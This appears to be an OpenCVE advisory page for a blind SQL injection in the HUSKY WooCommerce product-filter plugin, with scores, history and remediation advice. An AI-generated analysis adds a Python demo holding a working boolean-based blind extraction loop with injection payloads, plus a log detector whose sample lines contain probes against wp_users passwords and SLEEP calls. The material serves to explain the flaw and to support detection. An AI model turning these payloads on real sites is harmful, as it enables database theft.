Description
The HUSKY – Products Filter Professional for WooCommerce plugin for WordPress is vulnerable to blind SQL Injection via the `phrase` parameter in all versions up to, and including, 1.3.7.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
Published: 2025-10-28
Score: 7.5 High
EPSS: < 1% Very Low
KEV: No
Impact: Blind SQL Injection
Action: Immediate Patch
AI Analysis

Impact

The HUSKY – Products Filter Professional for WooCommerce plugin is vulnerable to blind SQL Injection through the `phrase` parameter. The flaw stems from inadequate escaping of the user-supplied value and the absence of a prepared statement, so a quote inside `phrase` terminates the string literal and lets an attacker append SQL conditions to the existing query. Because the injection is blind, the attacker learns results only indirectly (for example from whether the filter returns products, or how long the query takes), but that is enough to extract arbitrary database content without authentication. The CVSS vector records a high confidentiality impact and no direct integrity or availability impact.
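The mechanism described above, as an added illustration that is not the plugin's code (the plugin's actual query is not shown on this page): a hypothetical product search written in Python against an in-memory SQLite database, first with the phrase interpolated into the SQL text, then with a bound parameter plus LIKE-wildcard escaping, together with the boolean-based inference loop that turns such a flaw into data extraction. The table names, column names, product rows and the "secret" are constructed for the example; the WordPress equivalents of the hardened form are `$wpdb->prepare()` and `$wpdb->esc_like()`.

```python
import sqlite3
from collections.abc import Callable

# Constructed sample data for the demonstration; not the plugin's schema or content.
SAMPLE_PRODUCTS = [("Red mug", "kitchen"), ("Blue mug", "kitchen"), ("Desk lamp", "office")]
SAMPLE_SECRET = "wp_admin_hash_X9"  # constructed value standing in for sensitive data


def build_db() -> sqlite3.Connection:
    """In-memory SQLite database with a product table and a 'sensitive' table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (name TEXT, category TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)", SAMPLE_PRODUCTS)
    conn.execute("CREATE TABLE users (login TEXT, secret TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', ?)", (SAMPLE_SECRET,))
    return conn


def search_vulnerable(conn: sqlite3.Connection, phrase: str) -> list[str]:
    """Hypothetical vulnerable pattern (CWE-89): the phrase is interpolated
    straight into the SQL text, so a quote inside it ends the literal and
    everything after it is parsed as SQL."""
    sql = f"SELECT name FROM products WHERE name LIKE '%{phrase}%'"
    return [row[0] for row in conn.execute(sql)]


def search_hardened(conn: sqlite3.Connection, phrase: str) -> list[str]:
    """Parameter binding plus LIKE-wildcard escaping. The phrase travels as a
    bound value, never as SQL text, and % / _ are escaped so they match
    literally (the WordPress analogues are $wpdb->prepare() and $wpdb->esc_like())."""
    escaped = phrase.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = "SELECT name FROM products WHERE name LIKE ? ESCAPE '\\'"
    return [row[0] for row in conn.execute(sql, (f"%{escaped}%",))]


def blind_extract(oracle: Callable[[str], bool], max_len: int = 64) -> str:
    """Boolean-based blind extraction through a yes/no oracle.

    oracle(payload) returns True when the search still returns rows. The
    payload closes the LIKE literal with a quote, ANDs in a condition on the
    secret, and comments out the rest of the query, so the result set is
    non-empty exactly when the condition holds. Each character is found by
    bisecting the printable-ASCII range, about seven requests per character."""
    target = "(SELECT secret FROM users WHERE login = 'admin')"
    recovered = ""
    for pos in range(1, max_len + 1):
        if not oracle(f"' AND length({target}) >= {pos} --"):
            break  # no character at this position: the secret is fully recovered
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi + 1) // 2
            if oracle(f"' AND unicode(substr({target}, {pos}, 1)) >= {mid} --"):
                lo = mid
            else:
                hi = mid - 1
        recovered += chr(lo)
    return recovered


def demo() -> dict[str, object]:
    """Run both search variants against the same inputs and the blind loop
    against the vulnerable one."""
    conn = build_db()

    def oracle(payload: str) -> bool:
        return len(search_vulnerable(conn, payload)) > 0

    return {
        "vulnerable_normal": search_vulnerable(conn, "mug"),
        "vulnerable_tautology": search_vulnerable(conn, "' OR 1=1 --"),
        "leaked_secret": blind_extract(oracle),
        "hardened_normal": search_hardened(conn, "mug"),
        "hardened_payload": search_hardened(conn, "' OR 1=1 --"),
        "hardened_wildcard": search_hardened(conn, "%"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The oracle here is "did the search return any rows", which is the signal an unauthenticated visitor gets from a product filter; a timing oracle built on a slow subquery works the same way when the result set is hidden. Note that the hardened version needs both the bound parameter and the wildcard escaping: binding alone stops the injection, but a bare `%` or `_` in the phrase would still match everything.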

Affected Systems

The vulnerability affects the HUSKY – Products Filter Professional for WooCommerce plugin for WordPress, with all releases up to and including version 1.3.7.1. The plugin is distributed by realmag777.

Risk and Exploitability

The issue carries a CVSS 3.1 base score of 7.5 (High) with vector AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N: reachable over the network, low attack complexity, no privileges or user interaction required, high confidentiality impact and no integrity or availability impact. The EPSS score of < 1 % reflects a very low, but non-zero, probability of exploitation in the wild, the vulnerability is not listed in the CISA KEV catalog, and the SSVC assessment records Exploitation "none", Automatable "yes" and Technical Impact "partial". The expected attack path is an unauthenticated HTTP request to the plugin's product-filter handler with a crafted `phrase` value. Because the injection is blind, no query output is returned directly; the attacker infers data from differences in the response (content, size or timing) and needs many requests to recover each value.

Generated by OpenCVE AI on April 21, 2026 at 02:02 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Update the HUSKY – Products Filter Professional for WooCommerce plugin to a version newer than 1.3.7.1 as soon as the vendor publishes one; at the time of this enrichment no vendor fix or workaround is listed.
  • If an update is not possible, filter requests that carry the `phrase` parameter at a web application firewall (quote characters, comment sequences and SQL keywords are the usual indicators), or restrict access to the filtering feature through web-server or WordPress permissions, accepting that this also blocks legitimate unauthenticated use of the product filter.
  • Monitor database activity for anomalous queries or unauthorized data access, and review web-server logs for patterns consistent with blind SQL injection: bursts of near-identical requests from one client whose `phrase` value differs only in a comparison or condition, often with alternating response sizes or unusually slow responses.
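One way to implement the monitoring item above, as an added example rather than anything OpenCVE or the plugin vendor ships: a small Python script that parses Apache combined-format access logs, decodes the `phrase` query parameter, and flags clients that repeatedly send SQL tokens in it. The log lines, the `/shop/` path and the client addresses are constructed for the example and do not describe the plugin's real request routing.

```python
import re
from collections import defaultdict
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-format log lines; path and addresses are made up.
SAMPLE_LOG = """\
203.0.113.7 - - [28/Oct/2025:10:01:01 +0000] "GET /shop/?phrase=mug HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [28/Oct/2025:10:01:03 +0000] "GET /shop/?phrase=blue+mug HTTP/1.1" 200 3010 "-" "Mozilla/5.0"
192.0.2.5 - - [28/Oct/2025:10:01:40 +0000] "GET /shop/?phrase=men%27s+jacket HTTP/1.1" 200 2890 "-" "Mozilla/5.0"
198.51.100.9 - - [28/Oct/2025:10:02:10 +0000] "GET /shop/?phrase=%27+AND+1%3D1+-- HTTP/1.1" 200 5120 "-" "python-requests/2.31"
198.51.100.9 - - [28/Oct/2025:10:02:11 +0000] "GET /shop/?phrase=%27+AND+ascii%28substr%28%28SELECT+user_pass+FROM+wp_users%29%2C1%2C1%29%29%3E%3D64+-- HTTP/1.1" 200 5120 "-" "python-requests/2.31"
198.51.100.9 - - [28/Oct/2025:10:02:12 +0000] "GET /shop/?phrase=%27+AND+ascii%28substr%28%28SELECT+user_pass+FROM+wp_users%29%2C1%2C1%29%29%3E%3D96+-- HTTP/1.1" 200 1870 "-" "python-requests/2.31"
198.51.100.9 - - [28/Oct/2025:10:02:13 +0000] "GET /shop/?phrase=%27+AND+SLEEP%285%29+-- HTTP/1.1" 200 1870 "-" "python-requests/2.31"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Tokens that have no business in a product search phrase but appear in nearly
# every injection probe. A lone quote is deliberately a weak signal on its own
# ("men's jacket" is legitimate); it only counts once the per-client threshold
# is exceeded, because blind extraction needs many probes per character.
SQLI_TOKENS = re.compile(
    r"'|--|/\*|\b(?:union|select)\b|\b(?:sleep|benchmark|substr|substring|ascii|unicode)\s*\("
    r"|\b(?:and|or)\s+\d+\s*=\s*\d+",
    re.IGNORECASE,
)


def parse_line(line: str) -> Optional[dict]:
    """Return client IP, timestamp, decoded `phrase` and response size, or None
    when the line is not a request carrying a `phrase` query parameter."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    qs = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
    if "phrase" not in qs:
        return None
    return {"ip": m["ip"], "ts": m["ts"], "phrase": qs["phrase"][0], "size": m["size"]}


def detect(log_text: str, threshold: int = 2) -> dict[str, dict]:
    """Flag clients that sent at least `threshold` requests whose decoded
    `phrase` contains SQL injection tokens, keeping a few samples for triage."""
    per_ip: dict[str, dict] = defaultdict(lambda: {"requests": 0, "suspicious": 0, "samples": []})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        bucket = per_ip[rec["ip"]]
        bucket["requests"] += 1
        if SQLI_TOKENS.search(rec["phrase"]):
            bucket["suspicious"] += 1
            if len(bucket["samples"]) < 3:
                bucket["samples"].append(rec["phrase"])
    return {ip: b for ip, b in per_ip.items() if b["suspicious"] >= threshold}


if __name__ == "__main__":
    for ip, info in detect(SAMPLE_LOG).items():
        print(f"{ip}: {info['suspicious']}/{info['requests']} suspicious, samples={info['samples']}")
```

With the constructed input only 198.51.100.9 is reported; 192.0.2.5 sent one apostrophe in an ordinary phrase and stays below the threshold. The response-size column is worth keeping in the parsed record: a boolean-based blind probe typically alternates between two sizes (the "true" and "false" pages) while the phrase changes by a single number, which is a cheap second signal once a client is flagged.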

Advisories

No advisories yet.

History

Tue, 28 Oct 2025 14:15:00 +0000

Type      Values Removed   Values Added
Metrics                    ssvc: {'options': {'Automatable': 'yes', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Tue, 28 Oct 2025 10:30:00 +0000

Type                  Values Removed   Values Added
First Time appeared                    Realmag777; Realmag777 husky; Wordpress; Wordpress wordpress
Vendors & Products                     Realmag777; Realmag777 husky; Wordpress; Wordpress wordpress

Tue, 28 Oct 2025 05:45:00 +0000

Type          Values Removed   Values Added
Description                    The HUSKY – Products Filter Professional for WooCommerce plugin for WordPress is vulnerable to blind SQL Injection via the `phrase` parameter in all versions up to, and including, 1.3.7.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
Title                          HUSKY – Products Filter Professional for WooCommerce <= 1.3.7.1 - Unauthenticated SQL Injection via `phrase` Parameter
Weaknesses                     CWE-89
References
Metrics                        cvssV3_1: {'score': 7.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}


MITRE

Status: PUBLISHED

Assigner: Wordfence

Published:

Updated: 2026-04-08T17:31:16.039Z

Reserved: 2025-10-14T10:35:20.889Z

Link: CVE-2025-11735

Vulnrichment

Updated: 2025-10-28T13:32:53.331Z

NVD

Status : Deferred

Published: 2025-10-28T06:15:39.487

Modified: 2026-04-15T00:35:42.020

Link: CVE-2025-11735

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-21T02:15:06Z

Weaknesses